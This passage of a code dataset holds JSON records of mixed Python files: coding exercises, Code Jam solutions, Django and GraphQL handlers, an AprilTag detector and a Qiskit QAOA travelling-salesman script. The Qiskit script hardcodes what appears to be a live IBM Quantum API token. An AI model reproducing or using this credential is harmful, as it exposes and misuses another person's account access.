]\n\ntableName = ''\n\ndef addGameToDB(information):\n verified = json.loads(userVerification(information))\n if int(verified[\"errorcode\"])==0:\n databaseConnections = createDatabaseConnections(information)\n gameInformation = list(information[1].values())\n matchingGameInformation = len(list(databaseConnections[1].execute(\"\"\"SELECT * FROM\"\"\")))\n\n\n#removeGameFromDB()\n#retrieveGamesFromDB()\n#addUpdateToGame()\n#removeUpdateFromGame()\n#retrieveAllInfoOnGameInDB()\n#addMath()\n#subMath()","repo_name":"goldeneye5671/Game-Tracker-Ultimate","sub_path":"Depreciated FIles/user_game_database.py","file_name":"user_game_database.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3724118291","text":"# Day 19\n\nimport pandas as pd\nimport mysql.connector\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"\",\n database=\"bestenlist\"\n)\nmycursor = mydb.cursor()\nmycursor.execute(\n \"CREATE TABLE employee (name VARCHAR(255), id INT,salary INT)\")\n\n# a.\nmycursor.execute(\"SELECT max(salary),min(salary) FROM employee\")\nmyresult = mycursor.fetchall()\nfor x in myresult:\n print(f\"Max Salary : {x[0]}, Min Salary : {x[1]}\")\n\n# b.\nmycursor.execute(\"SELECT count(id) FROM employee\")\nmyresult = mycursor.fetchall()\nfor x in myresult:\n print(\"Number of employees : \", x[0])\n\n\n# c.\nmycursor.execute(\"SELECT substring(e.name,1,3) FROM employee e\")\nmyresult = 
mycursor.fetchall()\nfor x in range(len(myresult)):\n    print(myresult[x][0])\n","repo_name":"BenMeehan/BestEnlist","sub_path":"Day 20.py","file_name":"Day 20.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23606521671","text":"from numpy import *\nf = open('C-small-attempt0.in', 'r')\nd = open('c.out', 'w')\nc=int(f.readline())\nfor test in range(1,c+1):\n\tbuffer=0\n\tmoola=0\n\tcontroll=f.readline()\n\tgroups=f.readline()\n\tcontroll=controll.split()\n\tcontroll=map(int, controll) \n\tgroups=groups.split()\n\tqueu=map(int, groups) \n\tseat=list()\n\ttemp=0\n\tfor i in range(1,controll[0]+1):\n\t\tbuffer=0\n\t\twhile queu and queu[0]+buffer <= controll[1]:\n\t\t\tbuffer+=queu[0]\n\t\t\ttemp=queu.pop(0)\n\t\t\tseat.append(temp)\n\t\tfor x in seat:\n\t\t\tqueu.append(x)\t\n\t\tseat=[]\n\t\tmoola+=buffer\n\td.write ('Case #{0}: {1}\\n'.format(test,moola))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_55/800.py","file_name":"800.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12043225737","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.db.models import Q\nfrom django.urls import reverse\nfrom .models import Ingredient, Recipe\n# Create your views here.\n\n\ndef recipe_detail(request, pk):\n    \"\"\" Full information on a recipe, with step-by-step instructions \"\"\"\n    recipe = get_object_or_404(Recipe, pk=pk)\n    recipe.recipe_text = recipe.text.strip().split('\\n')\n    return render(\n        request,\n        'bookCook/recipe_detail.html',\n        {'recipe': recipe}\n    )\n\n\ndef home(request):\n    \"\"\" List of recipes with search by name and ingredients\"\"\"\n\n    try:\n        recipe_id = int(request.GET.get(\"recipe_id\"))\n    except (ValueError, TypeError):\n        recipe_id = None\n\n    try:\n        ingredient_id = int(request.GET.get(\"ingredient_id\"))\n    except (ValueError, TypeError):\n        ingredient_id = None\n\n    query = Q()\n    if recipe_id:\n        query.add(\n            Q(pk=recipe_id), Q.AND,\n        )\n    if ingredient_id:\n        query.add(\n            Q(ingredients__pk=ingredient_id), Q.AND,\n        )\n\n    recipes_object = Recipe.objects.prefetch_related(\"ingredients\").filter(query)\n    recipes = Recipe.objects.all()\n    ingredients = Ingredient.objects.all()\n\n\n    return render(\n        request,\n        'bookCook/recipes.html',\n        {\n            'recipes': recipes_object,\n            'form': {\n                'description': \"Here you can enter the name of a recipe or an ingredient\",\n                'ingredient': {\n                    'name': 'Ingredient',\n                    'objects': ingredients,\n                    'selected': ingredient_id,\n                },\n                'recipe': {\n                    'name': 'Name',\n                    'objects': recipes,\n                    'selected': recipe_id,\n                },\n            }\n        }\n    )\n","repo_name":"TaWerKa111/django-bookCook","sub_path":"app/bookCook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70113265476","text":"from datetime import date\nfrom ariadne import convert_kwargs_to_snake_case\nfrom api import db\nfrom api.models.user import User\nfrom modules.hash import hash_password\n\n\n@convert_kwargs_to_snake_case\ndef createUser_resolver(obj, info, username, password):\n    try:\n        prev_user = User.query.filter(User.username == username).scalar()\n        if prev_user:\n            payload = {\n                \"success\": False,\n                \"errors\": [\"username in use\"]\n            }\n        else:\n            today = date.today()\n            user = User(\n                username=username,\n                
hash=hash_password(password),\n display_name='',\n created_at=today,\n post_ids=[]\n )\n db.session.add(user)\n db.session.commit()\n payload = {\n \"success\": True,\n \"user\": user.to_dict()\n }\n except ValueError:\n payload = {\n \"success\": False,\n \"errors\": [\"Invalid date\"]\n }\n return payload\n\n\n@convert_kwargs_to_snake_case\ndef updateUser_resolver(obj, info, id, username, display_name):\n try:\n user = User.query.get(id)\n if user:\n user.username = username\n user.display_name = display_name\n db.session.add(user)\n db.session.commit()\n payload = {\n \"success\": True,\n \"user\": user.to_dict()\n }\n except AttributeError as error:\n payload = {\n \"success\": False,\n \"errors\": [\"user not found\", str(error)]\n }\n return payload\n\n\n@convert_kwargs_to_snake_case\ndef deleteUser_resolver(obj, info, id):\n try:\n user = User.query.get(id)\n db.session.delete(user)\n db.session.commit()\n payload = {\"success\": True, \"user\": user.to_dict()}\n except AttributeError:\n payload = {\n \"success\": False,\n \"errors\": [\"user not found\"]\n }\n return payload\n","repo_name":"zrwaite/CredibleSource","sub_path":"server/api/mutations/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30649078800","text":"import xml.etree.ElementTree\nimport dbnormalizer.experiments.functionalDepExtractor as extract\nimport dbnormalizer.experiments.Normalization_algo as depMatrix\n\n\ndef table_names(file):\n relations = []\n database = xml.etree.ElementTree.parse('dbnormalizer/output/' + file).getroot()\n for a in database.iter('table'):\n primary = []\n attributes = []\n for x in a.iter('attribute'):\n attributes.append(x.attrib['attname'])\n if str(x.find('columnKey').text).lower() == 'pri':\n primary.append(x.attrib['attname'])\n relations.append([a.attrib['tbname'], attributes,primary])\n return relations\n\n\n# get the relevant dependencies from the list\ndef get_relevantDep(fds, primary):\n alldep = []\n for i, key in enumerate(primary):\n relevantfds = []\n print(\"table Name, \",key[0])\n for fd in fds:\n if [fds for fds in fd[0] if fds in key[2]] and len(fd[0]) <= len(key[1]):\n relevantfds.append(fd)\n print(\"fd\",fd)\n if [fds for fds in fd[0] if fds in key[1] and (fds not in relevantfds)]:\n relevantfds.append(fd)\n print(\"fd\", fd)\n alldep.append([key[0], key[2], relevantfds])\n return alldep\n\n\ndef normalize(dep, relation, database_name):\n sqlText = ''\n for i in range(len(relation)):\n\n fds = dep[i][2]\n rel = relation[i][1]\n\n # ind = v\n # print(\"Table Name,\", v[0])\n # print(\"functional dep\", d[2])\n # print(\"relation\", ind)\n # rel = ind[1]\n\n # fds = d[2]\n # print(\"fds\",fds)\n DM, determinents = depMatrix.dependencyMatrix(rel, fds)\n # print(\"DM\")\n # print(DM)\n\n DG = depMatrix.directedGraph(DM, determinents, rel)\n # print(\"DG\")\n # print(DG)\n\n DC = depMatrix.dependencyClosure(DM, DG, determinents, rel, fds)\n # print(DC)\n\n CDC = depMatrix.circularDependency(DM, DC)\n # print(\"CDC\")\n # print(CDC)\n\n\n sqlText += str(depMatrix.to3NF(CDC, rel, fds, database_name))\n\n return sqlText\n\ndef start_normalizer(file_name=\"example_scenario.txt\", xml_file=\"example.xml\", database_name=None):\n\n content = extract.readfile(file_name)\n x = extract.table_names(xml_file)\n s = extract.get_functionaldep(extract.extractor(content))\n\n fds = extract.restructure_keys(s, x)\n\n tables = table_names(xml_file)\n\n 
dependencies = get_relevantDep(fds, tables)\n\n return normalize(dependencies, tables, database_name)\n","repo_name":"amilacjay/isyntax","sub_path":"dbnormalizer/experiments/tableNormalizer.py","file_name":"tableNormalizer.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23542884341","text":"def foo(s, k, c):\r\n num = 0\r\n for i in range(len(s) - k):\r\n if s[i] != c:\r\n for j in range(i, i + k):\r\n s[j] = '+' if s[j] == '-' else '-'\r\n num += 1\r\n cc = s[-k]\r\n if cc != c:\r\n num += 1\r\n for i in range(-k, 0):\r\n if cc != s[i]:\r\n return -1\r\n return num\r\n\r\n\r\nf = open(\"QA.in\", \"r\")\r\nout = open(\"QA.out\", \"w\")\r\nn = int(f.readline())\r\nfor t in range(n):\r\n line = f.readline().split()\r\n s1, s2, k = list(line[0]), list(line[0]), int(line[1])\r\n p = foo(s1, k, '+')\r\n if p == -1:\r\n out.write(\"Case #\" + str(t + 1) + \": IMPOSSIBLE\\n\")\r\n else:\r\n out.write(\"Case #\" + str(t + 1) + \": \" + str(p) + \"\\n\")\r\nout.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2251.py","file_name":"2251.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16079917749","text":"A = [3,4,3,2,3,-1,3,3]\n\ndef solution(A):\n # write your code in Python 3.6\n leader_index = -1\n if len(A) > 0:\n A_not_sorted = A.copy()\n A.sort() \n n = len(A)//2\n candidate = A[n]\n frequency = 0\n for i in range(len(A)):\n if A[i] == candidate:\n frequency += 1\n if frequency > n:\n leader_index = A_not_sorted.index(A[n])\n return leader_index\n\nprint(solution(A))\n","repo_name":"ymik0410/codility","sub_path":"dominator.py","file_name":"dominator.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70408634755","text":"# std\nimport unittest\n\n# internal\nfrom terraform_model.all import *\nfrom terraform_model.types.internal import TfUnknown\n\n\nclass TestTfRegex(unittest.TestCase):\n\n def test_tfregex_type(self):\n x = variable('x', type=TfString)\n result = tfregex('[a-z]+', x)\n self.assertIsInstance(result, TfUnknown)\n\n def test_tfregex_str(self):\n x = variable('x', type=TfString)\n result = str(tfregex('[a-z]+', x))\n self.assertEqual(result, 'regex(\"[a-z]+\", var.x)')\n","repo_name":"Mohadi3O/python-terraform-utils","sub_path":"packages/terraform_model/tests/test_functions/test_string/test_tfregex.py","file_name":"test_tfregex.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43401881910","text":"import pymongo\n\n_author_ = 'panong'\n\nuri = \"mongodb://Harry:Hogwarts4ever@192.142.32.100/gryffindor\"\nclient = pymongo.MongoClient(uri)\ndatabase = client['gryffindor']\ncollection = database['SortingHat']\n\n\ndef record():\n wizards = collection.find({})\n for person in wizards:\n print (\"Are you afraid of what you'll hear?\\nYour Animagus is a {}, {}\".format(person['Animagus'],person['Member']))\n\nrecord()\n\n","repo_name":"PatriciaAnong/Blog","sub_path":"Connect.py","file_name":"Connect.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"34760151933","text":"\nimport numpy as np\nimport torch as tr\nfrom torch.nn 
import Sequential, Conv2d, Linear, Flatten, ReLU, Tanh, Sigmoid\n\ndef TicTacToeNet1(board_size):\n    model = Sequential(Flatten(),Linear(4*board_size**2, 2, True),Tanh(),Linear(2,1))\n    return model\n    \n\ndef calculate_loss(net, x, y_targ):\n    y = net(x)\n    e = tr.sum((y-y_targ)**2)\n    return (y, e)\n    \n\ndef optimization_step(optimizer, net, x, y_targ):\n    optimizer.zero_grad()\n    y, e = calculate_loss(net, x, y_targ)\n    # print(\"Y:\\n\",y)\n    e.backward()\n    optimizer.step()\n    return (y,e)\n    \ndef helper(board_size):\n    net = TicTacToeNet1(board_size=board_size)\n    print(net)\n\n    import pickle as pk\n    with open(\"data1%d.pkl\" % board_size,\"rb\") as f: (x, y_targ) = pk.load(f)\n    optimizer = tr.optim.Adam(net.parameters())\n    print(optimizer)\n    train_loss, test_loss = [], []\n    shuffle = np.random.permutation(range(len(x)))\n    split = 5\n    train, test = shuffle[:-split], shuffle[-split:]\n    \n    for epoch in range(500):\n        y_train, e_train = optimization_step(optimizer, net, x[train], y_targ[train])\n        y_test, e_test = calculate_loss(net, x[test], y_targ[test])\n        if epoch % 10 == 0: print(\"%d: %f (%f)\" % (epoch, e_train.item(), e_test.item()))\n        train_loss.append(e_train.item() / (len(shuffle)-split))\n        np.seterr(divide='ignore', invalid='ignore')\n        test_loss.append(e_test.item() / split)\n    \n    tr.save(net.state_dict(), \"model%d.pth\" % board_size)\n    \n    \n\n    \n\n","repo_name":"hemant717556/tictactoewithAI","sub_path":"tictactoe_net.py","file_name":"tictactoe_net.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70449344834","text":"#This code detects the AprilTag shown to the camera and draws a bounding frame around it.\nimport cv2\nfrom apriltag import apriltag\nimport numpy as np\n\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n    # Capture frame-by-frame\n    ret, frame = cap.read()\n    cap.set(cv2.CAP_PROP_FRAME_WIDTH,640); \n    cap.set(cv2.CAP_PROP_FRAME_HEIGHT,640); \n    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    detector = apriltag('tag36h11')\n    results = detector.detect(frame)\n    print(results)\n    \n    for r in results:\n\t# extract the bounding box (x, y)-coordinates for the AprilTag\n\t# and convert each of the (x, y)-coordinate pairs to integers\n        (ptA, ptB, ptC, ptD) = r[\"lb-rb-rt-lt\"]\n        ptB = (int(ptB[0]), int(ptB[1]))\n        ptC = (int(ptC[0]), int(ptC[1]))\n        ptD = (int(ptD[0]), int(ptD[1]))\n        ptA = (int(ptA[0]), int(ptA[1]))\n\t# draw the bounding box of the AprilTag detection\n        cv2.line(frame, ptA, ptB, (0, 255, 0), 2)\n        cv2.line(frame, ptB, ptC, (0, 255, 0), 2)\n        cv2.line(frame, ptC, ptD, (0, 255, 0), 2)\n        cv2.line(frame, ptD, ptA, (0, 255, 0), 2)\n\t# draw the center (x, y)-coordinates of the AprilTag\n        (cX, cY) = (int(r[\"center\"][0]), int(r[\"center\"][1]))\n        cv2.circle(frame, (cX, cY), 5, (255, 255, 0), -1)\n\t# draw the tag family on the image\n    \n    \n\n    # Display the resulting frame\n    cv2.imshow('frame',frame)\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"fatmausalan/ApriltagExperiment","sub_path":"Code/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23553049851","text":"import sys\r\n\r\n\r\ndef tidy(number):\r\n    rev_number = list(reversed(number))\r\n    last_nine = -1\r\n    for i, digit in enumerate(rev_number):\r\n        if i < len(number)-1:\r\n            digit1 = 
int(rev_number[i])\r\n digit2 = int(rev_number[i+1])\r\n if digit1 < digit2:\r\n last_nine = i\r\n #print(rev_number)\r\n rev_number[i+1] = str(digit2-1)\r\n #print(rev_number)\r\n #print(last_nine)\r\n for j in range(last_nine+1):\r\n rev_number[j] = \"9\"\r\n res = list(reversed(rev_number))\r\n #print(res)\r\n #print(''.join(res).lstrip(\"0\"))\r\n return int(''.join(res).lstrip(\"0\"))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n name = \"B-large\"\r\n f = open(\"{0}.in\".format(name))\r\n output = open(\"{0}.out\".format(name), \"w\")\r\n cases = int(f.readline())\r\n for i in range(cases):\r\n num = list(f.readline().strip())\r\n #print(num)\r\n output.write(\"Case #\" + str(i + 1) + \": \" + str(tidy(num)) + \"\\n\")\r\n f.close()\r\n output.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1584.py","file_name":"1584.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34290093395","text":"import cv2\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QImage, QPixmap\nfrom zdl.utils.helper.opencv import countFrames\n\nfrom actionlabeller.model.AbcPlayable import AbcPlayable\nfrom actionlabeller.presenter import MySignals\nfrom actionlabeller.presenter.Settings import Settings\n\n\nclass Video(AbcPlayable):\n def __init__(self, fname):\n super().__init__()\n self.fname = fname\n self._cap = cv2.VideoCapture(self.fname)\n self._info = None\n self._indices = list(range(self.get_info()['frame_c']))\n # self.frames_buffer = queue.Queue(maxsize=100)\n\n def __del__(self):\n self._cap.release()\n\n def set_viewer(self, viewer):\n self.viewer = viewer\n return self\n\n def get_info(self):\n if self._info is None:\n cap = cv2.VideoCapture(self.fname)\n success, img = cap.read()\n fps = cap.get(cv2.CAP_PROP_FPS)\n frame_count = countFrames(cap=cap)\n duration = frame_count / fps\n self._info = {'fname': self.fname,\n 'frame_c': frame_count,\n 'duration': duration,\n 'shape': img.shape,\n 'width': img.shape[1],\n 'height': img.shape[0],\n 'channels': img.shape[2],\n 'fps': fps,\n 'Tms': 1000 / fps}\n return self._info\n\n @property\n def indices(self):\n return self._indices\n\n def to_head(self):\n self.schedule(0, -1, 0, self.__class__)\n\n def to_tail(self):\n tail = self.get_info()['frame_c'] - 1\n self.schedule(tail, -1, tail, self.__class__)\n\n def flush(self):\n if not self._flag_playing and self.scheduled.jump_to is None:\n return None\n if self.scheduled.stop_at:\n _interval = 1\n else:\n _interval = Settings.v_interval\n\n if self.scheduled.jump_to is not None:\n dest_index, self.scheduled.jump_to = self.scheduled.jump_to, None\n else:\n dest_index = self._flag_cur_index + _interval\n\n if self.scheduled.stop_at is not None and dest_index > self.scheduled.stop_at:\n self.scheduled.clear()\n self.pause()\n return None\n\n _gap = dest_index - self._flag_cur_index\n if _gap > 80 or _gap < 1:\n self._cap.set(cv2.CAP_PROP_POS_FRAMES, dest_index)\n _gap = 1\n while _gap:\n _gap -= 1\n ret, frame = self._cap.read()\n if not ret:\n self.schedule(0, -1, 0, MySignals.Emitter.V_PLAYER)\n return None\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n # self.frames_buffer.append((self.cur_index, frame))\n height, width, bytesPerComponent = frame.shape\n bytesPerLine = bytesPerComponent * width\n q_image = QImage(frame.data, width, height, bytesPerLine,\n QImage.Format_RGB888).scaled(self.viewer.width(), self.viewer.height(),\n 
Qt.KeepAspectRatio, Qt.SmoothTransformation)\n q_pixmap = QPixmap.fromImage(q_image)\n self.viewer.setPixmap(q_pixmap)\n\n self._flag_cur_index = dest_index\n self.signals.flushed.emit(self._flag_cur_index)\n return self._flag_cur_index\n","repo_name":"ZDL-Git/ActionLabeller","sub_path":"actionlabeller/model/Video.py","file_name":"Video.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"27727284187","text":"import time\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom docplex.mp.model import Model\nfrom qiskit_optimization.translators import from_docplex_mp\nfrom qiskit.utils import algorithm_globals, QuantumInstance\nfrom qiskit import Aer, execute, QuantumCircuit\nfrom qiskit.algorithms.minimum_eigensolvers import QAOA\nfrom qiskit_optimization.algorithms import MinimumEigenOptimizer\nfrom qiskit.algorithms.optimizers import COBYLA\n# from qiskit.primitives import Sampler\nfrom qiskit_optimization.converters.quadratic_program_to_qubo import QuadraticProgramToQubo\n\nfrom qiskit_ibm_runtime import Estimator, Sampler, Session\n\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# PREPARING THE TSP PROBLEM:\n\nn = 4 # establish the number of nodes for TSP\n\ncoordinates = np.random.default_rng(123).uniform(low=0, high=100, size=(n, 2))\n# create a random distribution of nodes in a grid (coordinates)\npos = dict()\nfor i, coordinate in enumerate(coordinates):\n pos[i] = (coordinate[0], coordinate[1])\n\nhigh = 100\nlow = 0\ngraph = nx.random_geometric_graph(n=n, radius=np.sqrt((high - low) ** 2 + (high - low) ** 2) + 1, pos=pos)\n\nfor w, v in graph.edges:\n delta = []\n for i in range(2):\n delta.append(graph.nodes[w][\"pos\"][i] - graph.nodes[v][\"pos\"][i])\n graph.edges[w, v][\"weight\"] = np.rint(np.sqrt(delta[0] ** 2 + delta[1] ** 2))\n\nindex = dict(zip(list(graph), range(n)))\nA = np.full((n, n), np.nan)\nfor u, wdict in graph.adjacency():\n for v, d in wdict.items():\n A[index[u], index[v]] = d.get(\"weight\", 1)\n\nA[np.isnan(A)] = 0.0\nA = np.asarray(A)\nM = np.asmatrix(A)\nprint(M)\n\n\n# defining the graph drawing fucntion\ndef draw_graph(G, colors, pos):\n default_axes = plt.axes(frameon=True)\n nx.draw_networkx(G, node_color=colors, node_size=600, alpha=.8, ax=default_axes, pos=pos)\n edge_labels = nx.get_edge_attributes(G, \"weight\")\n nx.draw_networkx_edge_labels(G, pos=pos, edge_labels=edge_labels)\n\n\ncolors = [\"r\" for node in graph.nodes]\npos = [graph.nodes[node][\"pos\"] for node in graph.nodes]\ndraw_graph(graph, colors, pos)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# DEFINING THE OPTIMIZATION PROBLEM (TSP):\n\nmdl = Model(name=\"TSP\") # establishing a model\n\n# defining the matrix tha connects the different nodes of the network\nx = dict()\nfor i in range(n):\n for j in range(n):\n x[(i, j)] = mdl.binary_var(name=\"x_{0}_{1}\".format(i, j))\n\n# defines the cost function being a product of all possible paths and the distances\nC_x = mdl.sum(\n M[i, j] * x[(i, k)] * x[(j, (k + 1) % n)]\n for i in range(n)\n for j in range(n)\n for k in range(n)\n if i != j\n)\n\n# establishes that the goal is to minimize the cost function\nmdl.minimize(C_x)\n\n# establishes the main constraint of the optimization problem, being 
that each node is visited once (first loop) and is\n# left once (second loop)\nfor i in range(n):\n    mdl.add_constraint(mdl.sum(x[i, p] for p in range(n)) == 1)\nfor p in range(n):\n    mdl.add_constraint(mdl.sum(x[i, p] for i in range(n)) == 1)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# TRANSFORMING THE QUADRATIC PROBLEM\n\n\nqp = from_docplex_mp(mdl)  # transforms the quadratic problem into a qiskit optimization QUADRATIC PROBLEM\nqubo = QuadraticProgramToQubo().convert(problem=qp)  # the quantum problem is now converted into a Quadratic\n# Unconstrained Binary Optimization problem so we can later apply Quantum Optimization Solvers\n\n\ndef route_x(x):\n    # \"route_x\" is a special tool that will help us later! ;)\n    # it searches a matrix of binary solutions to determine which nodes are joined in the solution and thus what is the\n    # shortest route\n    n = int(np.sqrt(len(x)))  # determines the grid size by taking the root square of the x length\n    route = []  # creates a route list\n    for p in range(n):  # iterates through the solution looking for the joined nodes and adding them to the list\n        for i in range(n):\n            if x[i * n + p]:\n                route.append(i)\n\n    return route\n\n\nalgorithm_globals.random_seed = 10598\n\ndef optimizer_call(qubo, session):\n\n    qaoa_mes = QAOA(sampler=Sampler(session = session), optimizer=COBYLA(), )\n    qaoa = MinimumEigenOptimizer(qaoa_mes)\n    qaoa_result = qaoa.solve(qubo)\n    print(\"\\nQAOA:\\n\", qaoa_result)\n    qaoa_result = np.asarray([int(y) for y in reversed(list(qaoa_result))])\n    print(\"\\nRoute\\n\", route_x(qaoa_result))\n\n    return\n\n\n# Quantum Instance creates a iteration of Qiskit Terra that stores the employed backend\n# quantum_instance = QuantumInstance(Aer.get_backend(\"qasm_simulator\"), seed_simulator=algorithm_globals.random_seed,\n#                                    seed_transpiler=algorithm_globals.random_seed)\nbackend = Aer.get_backend('qasm_simulator')\n\nopt_start_time = time.time()\n\n\nsession = Session(backend=backend)\noptimizer_call(qubo=qubo, session=session)\n\nopt_end_time = time.time()\nexecution_time = opt_end_time - opt_start_time\nlogging.debug(\"optimizer execution time on sim: {:.2f} seconds\".format(execution_time))\n\n# ----------------------------------------------------------------------------------------------------------------------\n# TRYING ON A QUANTUM BACKEND\n\nfrom qiskit_ibm_runtime import QiskitRuntimeService\n\nIBM_API = \"a998d08dcbe837698586eebef6b0bd5f6edb78e05a74cdd944ace2636e41329ffa39585a8f923c4145d02caf3931e2fd9c9b788164a7d0097795289c931ef872\"\n\nservice = QiskitRuntimeService(token=IBM_API)\nbackend = service.least_busy(simulator=True, operational=True, min_num_qubits=10)\n\nopt_start_time = time.time()\n\nsession = Session(backend=backend)\noptimizer_call(qubo=qubo, session=session)\n\nopt_end_time = time.time()\nexecution_time = opt_end_time - opt_start_time\nlogging.debug(\"optimizer execution time on backend: {:.2f} seconds\".format(execution_time))\n\n# opt_start_time = time.time()\n#\n# # Get the optimized circuit from the QAOA result\n# optimized_circuit = qaoa.get_optimal_circuit()\n# # optimized_circuit = qaoa_mes._ret['optimal_circuit']\n#\n# # Run the optimized circuit on the backend\n# job = execute(optimized_circuit, backend)\n# # Obtain the result of the job\n# result = job.result()\n# # Get the counts (measurement outcomes) from the result\n# counts = result.get_counts()\n#\n# opt_end_time = 
time.time()\n# execution_time = opt_end_time - opt_start_time\n#\n# # Print the measurement outcomes\n# print(counts)\n# print(\"Backend execution time: {:.2f} seconds\".format(execution_time))\n#\n","repo_name":"Quintanaaalberto/ciclab23","sub_path":"src/algorithms/tsp-medium.py","file_name":"tsp-medium.py","file_ext":"py","file_size_in_byte":6740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29175510253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 13 13:09:37 2019\r\n\r\n@author: Dan-L\r\n\"\"\"\r\n\r\nimport sys\r\nimport time\r\ndef createAaTable():\r\n #aa = ['A','B','C','D']\r\n #weights = [1,3,5,6]\r\n aa = ['G','A','S','P','V','T','C','I','L','N','D','K','Q','E','M','H','F','R','Y','W']\r\n weights = [57,71,87,97,99,101,103,113,113,114,115,128,128,129,131,137,147,156,163,186]\r\n massTable = dict(zip(weights, aa))\r\n return massTable\r\n\r\ndef findComb(pepMass):\r\n table = {}\r\n for i in range(pepMass+1):\r\n table[i] = 0\r\n aaTable = createAaTable()\r\n for w in aaTable:\r\n table[w] += 1\r\n for m in range(pepMass+1):\r\n #m is the current mass number\r\n for weight in aaTable:\r\n diff = m-weight\r\n #aa = aaTable[weight]\r\n if diff in table:\r\n table[m]+=table[diff]\r\n print(table[pepMass])\r\n return table[pepMass]\r\n\r\n \r\n \r\n\r\ndef main():\r\n start = time.time()\r\n# inNum = sys.argv[1]\r\n# inNum = int(inNum)\r\n pepMass = 1426\r\n numComb = findComb(pepMass)\r\n end = time.time()\r\n print(\"runtime:\", str(end-start), \"seconds\")\r\n \r\nmain()","repo_name":"dlewis27/rosalind","sub_path":"ComputeTheNumberOfPeptidesOfGivenTotalMass.py","file_name":"ComputeTheNumberOfPeptidesOfGivenTotalMass.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5385653221","text":"from typing import Optional\n\nclass Node:\n def __init__(self, value: int):\n self.value = value\n self.next: Optional[Node] = None\n\nclass LinkedList:\n def __init__(self, node: Node = None):\n self.head = node\n\n def append_head(self, node: Node):\n current = self.head\n self.head = node\n self.head.next = current\n \n def append_tail(self, node: Node):\n if self.head is None:\n self.head = node\n return\n \n current = self.head\n while current.next:\n current = current.next\n current.next = node\n\n def get_position(self, position: int) -> Optional[Node]:\n if position < 1:\n return None\n \n current = self.head\n while current:\n position -= 1\n if position == 0:\n return current\n current = current.next\n \n return None\n\n def insert(self, node: Node, position: int):\n if position < 1:\n return\n \n current = self.head\n if position == 1:\n self.head = node\n self.head.next = current\n return\n \n while current:\n position -= 1\n if position == 1:\n old_next = current.next\n current.next = node\n node.next = old_next\n return\n current = current.next\n \n def delete(self, value: int):\n if value == self.head.value:\n self.head = self.head.next\n return\n\n current = self.head\n while current:\n previous = current\n current = current.next\n if current.value == value:\n previous.next = current.next\n return\n","repo_name":"vladimirdotk/alg","sub_path":"python/alg/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37659382831","text":"import random\n\nsentence = \" 
